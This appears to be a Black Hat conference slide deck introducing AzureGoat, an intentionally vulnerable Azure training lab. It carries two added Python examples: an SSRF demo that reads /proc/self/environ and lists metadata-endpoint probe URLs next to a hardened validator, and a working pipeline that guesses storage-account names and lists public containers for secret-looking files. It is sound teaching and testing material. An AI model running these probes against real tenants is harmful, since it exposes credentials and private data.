AzureGoat : A Damn Vulnerable Azure Infrastructure
Jeswin Mathai, Nishant Sharma, Sherin Stephen, Rachana Umaraniya
#BHUSA @BlackHatEvents
About Us
Jeswin Mathai
• Chief Architect, Lab Platform @ INE
• Published research at Black Hat US/Asia Arsenal and DEF CON USA/China Demo Labs
• Gave research talks at DEF CON China and Rootcon Philippines
• Co-trainer in trainings at:
- Black Hat Asia
- HITB AMS, GSEC
- NZ OWASP Day
- Rootcon 13
Information Classification: General
About Us
Nishant Sharma
• Director, Lab Platform @ INE
• Firmware developer, enterprise WiFi APs and WIPS sensors, Mojo Networks (acquired by Arista Networks)
• Master's degree in Infosec
• Published research at Black Hat US/Asia, DEF CON USA/China, HITB Amsterdam and other venues
• Conducted trainings at HITB, OWASP NZ Day and for multiple private clients
About Us
Sherin Stephen
• Cloud Developer @ INE
• Presented his work at Black Hat Asia Arsenal 2022
• Experienced in building and maintaining reusable code and robust cloud services
Rachana Umaraniya
• Cloud Developer @ INE
• Master's degree in Computer Science
• Two years of experience in software development; specializes in Java frameworks
Threatscape
Motivation
• Training Needs
• Lack of a real-world Azure pentesting environment
• Contribution from the open source community and security professionals
• Release of OWASP Top 10: 2021
Introducing AzureGoat
AzureGoat : A Damn Vulnerable Azure Infrastructure
• Mimics real-world infrastructure, but with added vulnerabilities
• Multiple application stacks - multiple exploitation/escalation paths
• Features OWASP Top 10: 2021
• Focused on a black-box approach
• Still in an early stage
- Module 1 : Blog Application
OWASP Top 10
Image Reference: https://owasp.org/www-project-top-ten/
AzureGoat : Module 1 (Blog Application)
• A01: Broken Access Control
• A02: Cryptographic Failures
• A03: Injection
• A04: Insecure Design
• A05: Security Misconfiguration
• A07: Identification and Authentication Failures
• A10: Server-Side Request Forgery
Building a Realistic Insecure Application : Challenges
• Security professionals vs. seasoned developers
• Mimicking a real development process
• Multiple developer environments
• Fast-paced development
• Lack of secure coding practices
Project Family
Installation
• Repository: https://github.com/ine-labs/AzureGoat
• Requirements
- Azure CLI (az)
- Terraform
- Python
- Git
• Commands (run the Terraform steps from the cloned repository root)
- az login
- git clone https://github.com/ine-labs/AzureGoat
- terraform init
- terraform apply
• Caveat: this deploys intentionally vulnerable resources into whatever subscription az login selects. Use a dedicated, isolated subscription and tear the deployment down with terraform destroy when finished
Attacking the Application
• Reflected XSS
• SQL Injection
• Insecure Direct Object Reference
• Server-Side Request Forgery
• Sensitive Data Exposure
• Insecure Password Reset
• Storage Account Misconfiguration
• Privilege Escalation
Exploitation
Server Side Request Forgery
• Reading the source code of the application
• Reading the environment variables
- Storage account connection strings
- CosmosDB credentials
- Escalate privileges
• Enumerate other applications/instances in the network
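The slide above explains why an SSRF bug in a cloud-hosted web app turns into source-code and secret disclosure: if the server-side fetcher honours file:// URLs, the attacker reads the app's own files and /proc/self/environ, where a Linux App Service exposes its app settings and connection strings as environment variables. The following is an added example written for this page, not code from the AzureGoat repository (the blog app's real fetch endpoint is not shown in the deck). It places a minimal vulnerable fetcher beside a hardened pre-flight check; the hostnames, addresses and the fake environ content are constructed, and the resolver is injectable only so the check runs offline.

```python
"""SSRF: a vulnerable URL fetcher beside a hardened one (added example)."""
import ipaddress
import socket
import tempfile
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import urlopen


def vulnerable_fetch(url, timeout=3.0):
    """Fetches whatever the caller asks for. urllib also speaks file://, so an
    attacker can read local files: the application's source under
    /home/site/wwwroot, or /proc/self/environ with every app setting."""
    with urlopen(url, timeout=timeout) as resp:  # deliberately unsafe
        return resp.read()


def demo_local_file_read():
    """Offline demo: writes a constructed file shaped like /proc/self/environ
    (NUL-separated KEY=VALUE) and reads it back through the vulnerable fetcher."""
    constructed = (b"WEBSITE_SITE_NAME=blog-app\x00"
                   b"STORAGE_CONNECTION=DefaultEndpointsProtocol=https;"
                   b"AccountName=example;AccountKey=REDACTED==\x00")
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(constructed)
        path = Path(tmp.name)
    try:
        leaked = vulnerable_fetch(path.as_uri())   # file:///tmp/... URL
    finally:
        path.unlink()
    return [kv.decode() for kv in leaked.split(b"\x00") if kv]


def _is_public(ip):
    """Rejects loopback, RFC 1918, link-local (169.254.0.0/16, which contains
    the cloud instance-metadata endpoint 169.254.169.254), multicast,
    reserved and unspecified addresses."""
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_fetch_url(url, allowed_hosts, resolve=socket.getaddrinfo):
    """Hardened pre-flight check; returns (ok, reason). `resolve` is
    injectable for offline testing; in production keep socket.getaddrinfo."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    if host.lower() not in allowed_hosts:
        return False, "host %r not in allow-list" % host
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        infos = resolve(host, port)
    except socket.gaierror as exc:
        return False, "resolution failed: %s" % exc
    for info in infos:
        ip = ipaddress.ip_address(info[4][0].split("%")[0])  # drop IPv6 scope id
        if not _is_public(ip):
            return False, "%s resolves to non-public %s" % (host, ip)
    return True, "ok"


# Constructed DNS table so the hardened check can be exercised without network.
_FAKE_DNS = {
    "cdn.example.com": "93.184.216.34",      # a public address (constructed mapping)
    "internal.example.com": "10.0.0.5",      # RFC 1918
    "meta.example.com": "169.254.169.254",   # link-local / metadata endpoint
}


def _fake_resolve(host, port):
    if host not in _FAKE_DNS:
        raise socket.gaierror(-2, "Name or service not known")
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (_FAKE_DNS[host], port))]


def demo_validation():
    """Runs the hardened check over the URLs an SSRF hunter would try."""
    allowed = {"cdn.example.com", "internal.example.com", "meta.example.com"}
    urls = [
        "file:///proc/self/environ",
        "file:///home/site/wwwroot/app.py",
        "http://127.0.0.1:8080/admin",
        "http://cdn.example.com/logo.png",
        "http://internal.example.com/",
        "http://meta.example.com/metadata/instance",
        "http://[email protected]/",
    ]
    return {u: validate_fetch_url(u, allowed, resolve=_fake_resolve)[0] for u in urls}


if __name__ == "__main__":
    print(demo_local_file_read())
    for url, ok in demo_validation().items():
        print("ALLOW" if ok else "BLOCK", url)
```

Two caveats the check does not cover on its own: the resolve-then-connect gap allows DNS rebinding (pin the connection to the validated IP, or re-check inside the connect step), and urlopen follows redirects by default, so the hardened fetcher must also disable redirects or re-validate each hop.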
Hunting Storage Accounts and Containers
• Globally unique
• Company-wide naming practices: Predictable names - based on departments/applications
• Misconfigured Storage Account - plethora of information
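The two properties on this slide are what make storage-account hunting work: names are globally unique (3 to 24 lowercase letters and digits) and become public DNS labels under blob.core.windows.net, so a company-wide naming convention can be turned into a wordlist, confirmed with DNS before any HTTP request is sent, and then each container tried for anonymous listing. The following is an added example written for this page, not code from the AzureGoat repository. The organisation name, department and purpose wordlists, container names and the sample List Blobs response are all constructed; the DNS and HTTP steps are real requests and should only be run against a tenant you are authorised to test, such as your own AzureGoat deployment.

```python
"""Hunting Azure storage accounts by name, then probing for anonymous listing."""
import itertools
import re
import socket
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

NAME_RE = re.compile(r"^[a-z0-9]{3,24}$")      # Azure storage account name rules
BLOB_SUFFIX = ".blob.core.windows.net"


def valid_account_name(name):
    return bool(NAME_RE.match(name))


def generate_candidates(org, departments, purposes, envs=("", "dev", "prod")):
    """Expands a naming convention such as <org><dept><purpose><env> into
    candidate names, in a few orderings, dropping anything Azure would reject."""
    seen, out = set(), []
    for dept, purpose, env in itertools.product(departments, purposes, envs):
        for parts in ((org, dept, purpose, env), (org, purpose, dept, env),
                      (dept, org, purpose, env)):
            name = "".join(p.lower() for p in parts)
            if valid_account_name(name) and name not in seen:
                seen.add(name)
                out.append(name)
    return out


def account_exists(name):
    """Existence check that never touches the account: the blob endpoint is a
    public DNS name, so a failed lookup means the name is unused."""
    try:
        socket.gethostbyname(name + BLOB_SUFFIX)
        return True
    except socket.gaierror:
        return False


def parse_blob_list(xml_bytes):
    """Parses a List Blobs response (no XML namespace) into (name, size) pairs."""
    root = ET.fromstring(xml_bytes)
    blobs = []
    for blob in root.iter("Blob"):
        size = blob.findtext("Properties/Content-Length")
        blobs.append((blob.findtext("Name"), int(size) if size else None))
    return blobs


def list_container_anonymously(account, container, timeout=5.0):
    """Unauthenticated List Blobs call. HTTP 200 means the container allows
    public listing; any error is reported as 'not listable' without guessing why."""
    url = "https://%s%s/%s?restype=container&comp=list" % (account, BLOB_SUFFIX, container)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return parse_blob_list(resp.read())
    except (urllib.error.URLError, socket.timeout):
        return None


def interesting_blobs(blobs, patterns=(r"\.sql$", r"\.env$", r"\.bak$", r"\.csv$",
                                       r"(?i)secret|password|key")):
    """Flags blob names that usually repay a closer look."""
    return [b for b in blobs if any(re.search(p, b[0]) for p in patterns)]


def hunt(org, departments, purposes, containers=("backups", "data", "uploads")):
    """Full pipeline: wordlist -> DNS existence -> anonymous container listing."""
    findings = {}
    for name in generate_candidates(org, departments, purposes):
        if not account_exists(name):
            continue
        for container in containers:
            blobs = list_container_anonymously(name, container)
            if blobs is not None:
                findings[(name, container)] = blobs
    return findings


# Constructed List Blobs response, shaped like the real REST API output.
SAMPLE_LISTING = b"""<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://acmehrbackups.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>employees-2022.csv</Name><Properties><Content-Length>48213</Content-Length><Content-Type>text/csv</Content-Type></Properties></Blob>
    <Blob><Name>db/dump.sql</Name><Properties><Content-Length>9011234</Content-Length><Content-Type>application/octet-stream</Content-Type></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>"""


if __name__ == "__main__":
    names = generate_candidates("acme", ["hr", "finance"], ["backups", "data"])
    print(len(names), "candidates, e.g.", names[:4])
    print(interesting_blobs(parse_blob_list(SAMPLE_LISTING)))
```

hunt() performs live lookups and requests; the offline pieces (name generation and response parsing) are what the sample data exercises. Listings with many blobs are paged via NextMarker, which this parser does not follow, and responses from an untrusted endpoint are better parsed with defusedxml than the stdlib parser.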
Privilege Escalation
Future Plans: Multiple Applications across Multiple Tenants
Image Reference: Architecting multitenant solutions on Azure
Future Plans
• More modules: Virtual Machine, Container Instances and AKS
• Multi Tenant infrastructure
• Working with the community
• IaC Misconfigurations
• Secure coding/deployment practices
Thanks
[email protected]